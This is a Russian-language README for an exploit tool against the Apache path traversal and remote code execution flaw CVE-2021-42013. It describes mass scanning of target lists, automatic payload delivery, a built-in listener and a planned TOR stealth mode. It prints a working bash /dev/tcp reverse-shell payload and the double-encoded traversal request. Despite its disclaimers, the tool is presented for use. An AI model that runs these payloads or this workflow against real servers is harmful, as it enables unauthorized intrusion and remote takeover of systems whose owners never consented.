
Продвинутый инструмент для сканирования, эксплуатации и удалённого взаимодействия, предназначенный для обнаружения и использования уязвимости Apache Path Traversal + RCE (CVE-2021-42013) на неправильно сконфигурированных серверах.
# 🔥 CVE-2021-42013 Exploit Framework от Makaveli
> 💀 Космический многомерный хакерский режим активирован...
Продвинутый инструмент сканирования, эксплуатации и удалённого взаимодействия, предназначенный для обнаружения и использования уязвимости **Apache Path Traversal + RCE (CVE-2021-42013)** на неправильно сконфигурированных серверах.
---
## ⚠️ Правовое предупреждение
> Данное программное обеспечение предоставляется исключительно в образовательных и исследовательских целях в контролируемых средах.
Использование этого инструмента против систем без явного разрешения может быть незаконным и является преступлением во многих странах.
Автор не несёт ответственности за ненадлежащее использование этого кода. Используйте его на свой страх и риск и только с явного разрешения владельца целевой системы.
---
🧠 Техническое описание
Этот инструмент позволяет:
- ✅ Сканировать несколько целей из файла `.txt`.
- ✅ Автоматически обнаруживать наличие CVE-2021-42013.
- ✅ Определять удалённую операционную систему (Linux или Windows).
- ✅ Отправлять настраиваемые payload'ы в зависимости от обнаруженной системы.
- ✅ Устанавливать reverse shell и получать удалённый доступ.
- ✅ Взаимодействовать с оболочкой в реальном времени через встроенный listener.
- ✅ Пользоваться расширенными логами, индикатором прогресса и интерактивным меню.
---
## 🔧 Требования
- Python **3.8+**
- Системы на базе Unix/Linux/MacOS (использование `subprocess` и `curl`)
- Требуются следующие библиотеки Python:
```bash
pip install -r requirements.txt
```
**`requirements.txt`**
```
rich
alive-progress
```
Также на операционной системе должен быть установлен `curl`.
---
## 📁 Структура файлов
```
.
├── POC-CVE.py # Script principal
├── logs.txt # Archivo de logs generado automáticamente
├── requirements.txt # Dependencias Python
└── targets.txt # (Opcional) Lista de URLs a escanear
```
---
## 🚀 Интерактивное использование
```bash
python3 POC-CVE.py
```
Выберите один из режимов:
* `scan_file`: сканирует несколько URL из файла и показывает, какие из них уязвимы.
* `exploit`: прямая эксплуатация одной цели с reverse shell.
* `exit`: выход из интерактивного режима.
---
## 🔍 Массовое сканирование (scan\_file)
1. Создайте файл со списком URL, по одному в строке:
```txt
http://example.com
http://victim.net
http://192.168.1.100
```
2. Запустите сканирование:
```bash
python3 POC-CVE.py
```
Выберите `scan_file` и укажите:
* Путь к файлу
* Количество потоков (threads) для параллельного сканирования
---
## 💥 Эксплуатация (exploit)
1. Выберите `exploit` в меню.
2. Введите:
* URL цели
* Ваш локальный IP (`LHOST`) для приёма shell
* Свободный порт (`LPORT`) для listener
Скрипт:
* Определит, уязвима ли цель.
* Отправит подходящий payload в зависимости от удалённой операционной системы.
* Откроет **listener** и предоставит вам интерактивный доступ.
---
## 🧪 Примеры Payload'ов
### Linux Payload (Bash TCP Reverse Shell)
```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```
### Windows Payload (PowerShell TCP Reverse Shell)
```powershell
powershell -NoP -NonI -W Hidden -Command ...
```
---
## 🧠 Используемые техники
* Path traversal с двойным кодированием (`/.%252e/.%252e/.%252e`)
* Инъекция команд через `curl`
* Обходные заголовки (`User-Agent`, `Accept` и т. д.)
* Reverse shell для получения удалённого контроля
* Многопоточность и индикатор прогресса (Alive Progress)
* Логирование с временными метками и Rich Console
---
## 📌 Справка по CVE
* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Вектор атаки**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Воздействие**: RCE (Remote Code Execution)
* **Оценка CVSS**: 9.8 (критическая)
---
## 🧙♂️ Автор
* ✨ **Makaveli** — *«Взломай свою собственную реальность»*
---
## 🛡️ Отказ от ответственности
> Этот проект предоставляется «как есть», без каких-либо гарантий и ответственности за ущерб, возникший в результате его использования.
> **Никогда не сканируйте и не эксплуатируйте систему без явного согласия её владельца.**
---
## ✅ Рекомендации
* Используйте этот скрипт только в **лабораторных средах** или при авторизованном тестировании.
* Убедитесь, что порт, заданный для listener, **открыт** и **не блокируется брандмауэром**.
* Запускайте от обычного пользователя (не root), если только это не строго необходимо.
---
## 🧩 Планы на будущее (необязательно)
* [ ] Поддержка пользовательских payload'ов
* [ ] Экспорт результатов в CSV/JSON
* [ ] Stealth-режим с ротацией заголовков и TOR-прокси
* [ ] Локальный веб-интерфейс (Flask)
@DonMakaveliw, ты готов создать будущее?